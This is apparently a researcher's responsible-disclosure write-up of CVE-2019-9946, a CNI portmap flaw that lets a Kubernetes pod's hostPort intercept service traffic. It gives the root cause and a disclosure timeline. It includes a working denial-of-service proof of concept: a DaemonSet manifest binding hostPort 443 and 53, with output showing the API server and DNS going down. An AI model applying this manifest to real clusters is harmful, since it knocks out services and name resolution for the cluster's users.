When I first discovered this bug, I opened an issue #72522 on Kubernetes repo, without thinking much about the security implications.
Fast forward 4 days later and some more testing, I found out that using hostPort allowed to intercept not only LoadBalancer traffic as initially reported, but any services traffic, so I reported it to [email protected].
To clearly show the issue, I sent this trivial denial of service proof of concept:
# curl https://10.233.0.1:443/api -k
{
"kind": "APIVersions",
"versions": [
...
# kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: dosk8s-ds
spec:
selector:
matchLabels:
app: dosk8s
template:
metadata:
labels:
app: dosk8s
spec:
containers:
- name: pause
image: k8s.gcr.io/pause
ports:
- name: dos443
containerPort: 443
hostPort: 443
- name: dos53t
containerPort: 53
hostPort: 53
- name: dos53u
containerPort: 53
hostPort: 53
protocol: UDP
EOF
# curl https://10.233.0.1:443/api -k
curl: (7) Failed connect to 10.233.0.1:443; Connection refused
# nslookup google.com
nslookup: can't resolve '(null)': Name does not resolve
nslookup: can't resolve 'google.com': Try again
In the end the issue was in CNI (Container network interface) portmap plugin, that was inserting iptables rules instead of appending them, taking precedence other Kubernetes services rules.
- 2019-01-03: Initial public bug report.
- 2019-01-07: Initial private bug report to [email protected].
- 2019-01-17: The networking team can reproduce the issue but they are still investigating.
- 2019-02-27: The networking team believe that the issue is in CNI only. CNI developers have proposed a fix that is being reviewed. I ask if there is already a CVE for this bug.
- 2019-03-19: The networking team is testing a new version of the CNI plugin. K8S security team can't issue a CVE for CNI, and CNI can't issue CVE for now, so WIP.
- 2019-03-25: CVE-2019-9946 has been reserved for this issue.
- 2019-03-28: Public diclosure.